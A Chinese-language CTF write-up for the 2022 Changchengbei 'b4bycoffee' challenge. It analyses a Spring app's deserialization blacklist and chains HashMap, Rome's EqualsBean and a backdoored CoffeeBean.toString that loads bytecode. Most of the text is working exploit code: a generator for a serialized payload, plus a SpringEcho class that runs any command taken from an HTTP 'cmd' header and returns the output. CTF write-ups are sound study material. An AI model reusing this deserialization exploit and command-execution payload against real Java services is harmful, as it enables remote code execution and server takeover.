【Web】记录[长城杯 2022 高校组]b4bycoffee题目复现

目录

前言

环境准备

简单分析

EXP

---

前言

本地jar包运行打通了，远程500，nss靶机有问题，换了bugku就可(

主要记录下做题过程，纯菜狗，小白文

环境准备

这次附件给的jar包是可执行jar，不是可依赖jar，不能直接add as lib导入项目

需要进行如下的处理

先是对jar包进行解压

用jadx-gui打开

 

 

简单分析

先来看pom

比较刺眼的是Rome依赖，还有spring可能会用于写内存马

接着注意到/b4by/coffee路由，此处便是反序列化入口

AntObjectInputStream是自定义的对象输入流类，写了一些关键类的黑名单

可以看到ban了ObjectBean，ToStringBean这些Rome链的sink点，TemplatesImpl这种实例化关键类，以及BadAttributeValueExpException这条CC5里触发ToString方法的类

好在EqualsBean还是在的，依然可以配合HashMap来触发ToString

此外AntObjectInputStream还重写了resolveClass，就是配合黑名单用的

现在问题是加载恶意类的ToStringBean&TemplatesImpl被ban了，空留toString何用？

“当上帝为你关闭了一扇门,就一定会为你打开一扇窗。”

我们看到coffeeBean类重写了toString方法，存在着能加载字节码的后门defineClass(用于将字节数组表示的类定义转换为 Class 对象)，并对其进行实例化。

那这不就易如反掌易如反掌了吗(

手搓链子(不会tabby，锐意学习中)

java.util.HashMap#readObject
java.util.HashMap#hash
com.rometools.rome.feed.impl.EqualsBean#hashCode
com.rometools.rome.feed.impl.EqualsBean#beanHashCode
com.example.b4bycoffee.model.CoffeeBean#toString

EXP

记得pom里再导一个javassist依赖

<dependency><groupId>org.javassist</groupId><artifactId>javassist</artifactId><version>3.29.2-GA</version></dependency>

 GenPayload.java

package com.example.b4bycoffee.exp;import com.example.b4bycoffee.model.CoffeeBean;
import com.rometools.rome.feed.impl.EqualsBean;
import javassist.ClassPool;import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;public class GenPayload {public static void setFieldValue(Object obj, String fieldName, Object newValue) throws Exception {Class clazz = obj.getClass();Field field = clazz.getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, newValue);}public static String getPayLoad() throws Exception {byte[] code = ClassPool.getDefault().get(SpringEcho.class.getName()).toBytecode();CoffeeBean coffeeBean = new CoffeeBean();setFieldValue(coffeeBean, "ClassByte", code);EqualsBean equalsBean = new EqualsBean(String.class, "test");HashMap map = new HashMap();map.put(equalsBean, "xxx");setFieldValue(equalsBean, "obj", coffeeBean);setFieldValue(equalsBean, "beanClass", CoffeeBean.class);ByteArrayOutputStream baos = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(baos);oos.writeObject(map);oos.close();String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));System.out.println(payload);return payload;}public static void main(String[] args) throws Exception {getPayLoad();}
}

SpringEcho.java

不出网没法反弹shell，内存马也没写起来，我怎么不去死一死QWQ

命令执行用下面SpringEcho类来回显

(参考链接：java回显学习 | 现科信息安全协会)

package com.example.b4bycoffee.exp;import java.lang.reflect.Method;
import java.util.Scanner;public class SpringEcho {static {try {Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");Method m = c.getMethod("getRequestAttributes");Object o = m.invoke(null);c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");m = c.getMethod("getResponse");Method m1 = c.getMethod("getRequest");Object resp = m.invoke(o);Object req = m1.invoke(o); // HttpServletRequestMethod getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);getHeader.setAccessible(true);getWriter.setAccessible(true);Object writer = getWriter.invoke(resp);String cmd = (String)getHeader.invoke(req, "cmd");String[] commands = new String[3];if (System.getProperty("os.name").toUpperCase().contains("WIN")) {commands[0] = "cmd";commands[1] = "/c";} else {commands[0] = "/bin/sh";commands[1] = "-c";}commands[2] = cmd;writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream()).useDelimiter("\\A").next());writer.getClass().getDeclaredMethod("flush").invoke(writer);writer.getClass().getDeclaredMethod("close").invoke(writer);} catch (Exception e) {}}
}

header注入cmd即可